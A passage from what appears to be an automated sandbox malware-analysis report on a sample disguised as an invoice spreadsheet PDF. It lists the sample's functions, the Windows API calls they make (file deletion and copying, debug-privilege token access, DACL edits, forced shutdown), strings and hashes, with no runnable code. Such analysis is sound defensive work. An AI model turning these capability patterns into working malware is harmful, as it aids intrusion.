                                                                              • _wcscat.LIBCMT ref: 0044BE97
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                              • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                              • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                              • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                              • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                              • String ID: \*.*
                                                                              • API String ID: 2188072990-1173974218
                                                                              • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                              • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                              • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                              • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                              • __swprintf.LIBCMT ref: 00434D91
                                                                              • _wcslen.LIBCMT ref: 00434D9B
                                                                              • _wcslen.LIBCMT ref: 00434DB0
                                                                              • _wcslen.LIBCMT ref: 00434DC5
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                              • _memset.LIBCMT ref: 00434E27
                                                                              • _wcslen.LIBCMT ref: 00434E3C
                                                                              • _wcsncpy.LIBCMT ref: 00434E6F
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                              • String ID: :$\$\??\%s
                                                                              • API String ID: 302090198-3457252023
                                                                              • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                              • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                              • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                              • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                              APIs
                                                                                • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                              • GetLastError.KERNEL32 ref: 004644B4
                                                                              • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                              • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                              • String ID: SeDebugPrivilege
                                                                              • API String ID: 1312810259-2896544425
                                                                              • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                              • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                              • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                              • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                              • __wsplitpath.LIBCMT ref: 004038B2
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcscpy.LIBCMT ref: 004038C7
                                                                              • _wcscat.LIBCMT ref: 004038DC
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                              • _wcscpy.LIBCMT ref: 004039C2
                                                                              • _wcslen.LIBCMT ref: 00403A53
                                                                              • _wcslen.LIBCMT ref: 00403AAA
                                                                              Strings
                                                                              • _, xrefs: 00403B48
                                                                              • Unterminated string, xrefs: 0042B9BA
                                                                              • Error opening the file, xrefs: 0042B8AC
                                                                              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                              • API String ID: 4115725249-188983378
                                                                              • Opcode ID: bdac8a523e5c782a8e9713f1e4d900b97f7744cbb589f867386334d19998b9d5
                                                                              • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                              • Opcode Fuzzy Hash: bdac8a523e5c782a8e9713f1e4d900b97f7744cbb589f867386334d19998b9d5
                                                                              • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                              • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                              • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                              • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                              • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                              • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1409584000-438819550
                                                                              • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                              • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                              • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                              • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Timetime$Sleep
                                                                              • String ID: BUTTON
                                                                              • API String ID: 4176159691-3405671355
                                                                              • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                              • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                              • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                              • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,75918FB0,75918FB0,?,?,00000000), ref: 00442E40
                                                                              • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                              • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                              • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                                • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                              • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 2640511053-438819550
                                                                              • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                              • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                              • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                              • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                              APIs
                                                                                • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                              • _memset.LIBCMT ref: 00445E61
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                              • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                              • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                              • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                              • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                              • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3490752873-0
                                                                              • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                              • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                              • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                              • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                              • _memset.LIBCMT ref: 0047AB7C
                                                                              • _wcslen.LIBCMT ref: 0047AC68
                                                                              • _memset.LIBCMT ref: 0047ACCD
                                                                              • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                              • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                              Strings
                                                                              • NULL Pointer assignment, xrefs: 0047AD84
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 1588287285-2785691316
                                                                              • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                              • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                              • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                              • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                              • GetLastError.KERNEL32 ref: 00436504
                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                              • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 2938487562-3733053543
                                                                              • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                              • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                              • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                              • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                              APIs
                                                                              • __swprintf.LIBCMT ref: 00436162
                                                                              • __swprintf.LIBCMT ref: 00436176
                                                                                • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                              • __wcsicoll.LIBCMT ref: 00436185
                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                              • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                              • LockResource.KERNEL32(?), ref: 004361FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                              • String ID:
                                                                              • API String ID: 2406429042-0
                                                                              • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                              • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                              • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                              • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                              • GetLastError.KERNEL32 ref: 0045D59D
                                                                              • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                              • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                              • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                              • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                              APIs
                                                                              • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • _wcslen.LIBCMT ref: 0047AE18
